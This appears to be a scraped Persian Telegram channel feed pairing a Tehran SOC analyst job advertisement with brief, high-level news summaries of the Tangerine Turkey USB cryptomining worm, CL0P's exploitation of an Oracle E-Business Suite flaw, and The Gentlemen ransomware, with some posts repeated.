4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
🖥 ارسال رزومه به : [email protected]
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
4️⃣شایستگی های تخصصی:
• آشنایی با مفاهیم امنیت و SOC
• آشنایی بایکی از SIEM های بومی وغیر بومی
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• آشنا به لاگ های انواع سیستم عامل ، وب وشبکه
• آشنایی با انواع حملات در لایههای مختلف شبکه
• آشنایی با انواع حملات وب
• آشنا به مفاهیم شبکه و محصولات امنیتی مانند فایروالها، WAF ,DLP ,IPS/IDS
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
•توانایی حضور در شیفت ساعات غیر کاری
نیازمندیهای نیروی سطح 2:
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 2 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• تسلط به مفاهیم امنیت و SOC
• تسلط به splunk و SPL پیشرفته (advanced SPL)
• توانایی بررسی، تحلیل و گزارش رخدادهای SIEM و مستندسازی
• تسلط به لاگ های انواع سیستم عامل ، وب وشبکه
• تسلط به انواع حملات در لایههای مختلف شبکه
• توانایی ایجاد use case و correlation search در splunk
• تسلط به متدهای MITRE ATT&CK
• آشنا به سرویس های زیرساختی از جمله DNS ،DC ،DHCP
• تسلط بر مهارتهای Incident Response
نیازمندیهای نیروی سطح 3 :
1️⃣دارای کارت پایان خدمت
2️⃣ حداقل مدرک لیسانس در رشته های مرتبط
3️⃣ حداقل 4 سال تجربه در حوزه امنیت و SOC
4️⃣ شایستگی های تخصصی:
• توانایی شکار تهدیدات (Threat Hunting & Proactive Analysis)
• آشنایی با معماری امنیتی شبکه نظیر Zero Trust
• تسلط بر روی تحلیل حملات سطح وب
• طراحی و توسعه ماژول های مختلف اسپلانک اعم از ES، UBA و MLTK
• تجربه کاری با ابزار هایThreat Intelligence ، SOAR و EDR
• آشنایی با دیجیتال فارنزیک (Digital Forensics برای جمعآوری شواهد
• توانایی خودکارسازی فرایندهای امنیتی، توسعه پلیبوکها و بسترهای SOAR
• تسلط و سفارشی سازی ابزارهایEDR،SIEM و Sysmon برای پایش رفتارهای مخرب
• آشنایی با تکنیکهای شبیهسازی حملات با ابزارهایی مانند Atomic Red Team و Caldera
• تجربهی عملی در حوزه تحلیل رخدادهای امنیتی(Incident Response) و شناسایی منشا حملات (Root Cause Analysis)
• تسلط عمیق بر روی فریم ورک هایی هایی نظیر MITRE ATT&CK / D3FEND و نحوه استفاده از آن در تحلیلهای امنیتی و یوزکیس نویسی
• تسلط بر روی پروتکل های شبکه نظیر TCP/IP, DNS, SSL, SMB, HTTP, IP Routing و تحلیل ترافیک (PCAP, NetFlow) جهت شناسایی C2 و فعالیت های مخرب
• مستندسازی یافتهها و پیشنهاد راهکارهای مقابله با تهدید
امکانات و تسهیلات:
⭕️ محیط پویا و برگزاری دوره های اموزشی مورد نیاز
⭕️پرداخت به موقع حقوق و مزایا
⭕️پرداخت پاداش عملکرد
⭕️بیمه کامل تامین اجتماعی
⭕️بیمه تکمیلی
⭕️هدایای سازمانی
⭕️وام سازمانی
⬅️ روز و ساعات کاری: شنبه تا چهارشنبه | ۷ تا ۱۵:۳۰
⬅️محدوده محل کار: تهران، چهارراه ولیعصر
Please open Telegram to view this post
VIEW IN TELEGRAM
🟧 تهدید جدید Tangerine Turkey؛ سوءاستفاده از USB برای ماینینگ مخفیانه
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار بدافزاری تازه شناساییشده با نام Tangerine Turkey، مهاجمان از یک کرم مبتنی بر VBScript استفاده میکنند که از طریق فلشدرایوهای USB آلوده گسترش مییابد. این بدافزار با بهرهگیری از باینریهای قانونی ویندوز مانند wscript.exe و printui.exe، اجرای خود را پنهان کرده و با ایجاد سرویسها و وظایف زمانبندیشده، حضور ماندگار در سیستم برقرار میکند. هدف اصلی این عملیات، استخراج غیرمجاز ارز دیجیتال با استفاده از XMRig و سوءاستفاده از منابع پردازشی قربانی است.
با توجه به افزایش حملات مبتنی بر وسایل جانبی قابلحمل، سازمانها باید سیاستهای سختگیرانهتری برای کنترل اجرای اسکریپتها، نظارت بر تغییرات رجیستری و سرویسها، و محدودسازی اجرای فایلهای مشکوک از روی USB اعمال کنند. همچنین آموزش کاربران درباره خطرات وسایل ذخیرهسازی ناشناس، یکی از مؤثرترین راهکارها برای پیشگیری از چنین حملاتی است.
در یک کارزار هدفمند و پیچیده، گروه باجافزاری CL0P با سوءاستفاده از آسیبپذیری بحرانی CVE-2025-61882 در Oracle E-Business Suite موفق به دسترسی غیرمجاز به محیط سازمانی برخی شرکتها شده است. این نقص امنیتی امکان اجرای کد از راه دور بدون نیاز به احراز هویت را فراهم کرده و مهاجمان از این قابلیت برای استخراج دادههای حساس، نقشهبرداری از سامانهها و استقرار ابزارهای ثانویه بهره بردهاند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
پس از نفوذ، مهاجمان با ارسال پیامهای تهدیدآمیز به مدیران ارشد، سازمانها را تحت فشار قرار داده و باجخواهی را آغاز کردهاند. شواهد نشان میدهد کل زنجیره حمله با دقت بالا، استفاده از ابزارهای مشروع برای پنهانسازی ردپا، و تکنیکهای ماندگاری پیشرفته انجام شده است؛ موضوعی که ضرورت بازبینی کامل امنیتی و تحقیق دیجیتال را دوچندان میکند.
این حادثه بار دیگر نشان میدهد سامانههای حیاتی مانند Oracle EBS، بهدلیل ماهیت دادههای حساس و نقش کلیدیشان در کسبوکار، باید با حداکثر سطح نظارت، وصلهگذاری و کنترل امنیتی نگهداری شوند.
تحلیل فنی باجافزار The Gentlemen؛ یک تهدید نوظهور با معماری RaaS پیشرفته
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
باجافزار The Gentlemen بهعنوان یکی از مهمترین تهدیدات نوظهور سالهای اخیر مطرح شده و با اتخاذ مدل Ransomware-as-a-Service (RaaS) توانسته است طیف وسیعی از مهاجمان را به خود جذب کند. این بدافزار با استفاده از الگوریتمهای رمزگذاری مدرن از جمله XChaCha20 و Curve25519، دادههای حیاتی سازمان را قفل کرده و همزمان با یک استراتژی دوگانه، اقدام به سرقت اطلاعات و تهدید به انتشار آنها میکند؛ رویکردی که میزان فشار و احتمال پرداخت باج را بهطور قابلتوجهی افزایش میدهد.
از منظر عملیاتی، The Gentlemen دارای یک زنجیره نفوذ بالغ و چندلایه است. این باجافزار از سازوکارهای مختلفی برای انتشار و ماندگاری بهره میگیرد؛ از جمله اجرای دستورات از طریق WMI و PowerShell Remoting، ایجاد Scheduled Taskهای اختصاصی، و سوءاستفاده از سرویسهای قانونی ویندوز برای اجرای بیصدا. علاوه بر این، این خانواده دارای نسخههای جداگانه برای Windows، Linux و ESXi است، که نشاندهنده بلوغ بالای توسعه و هدفگذاری سیستمهای سازمانی در مقیاس گسترده است.
🔥1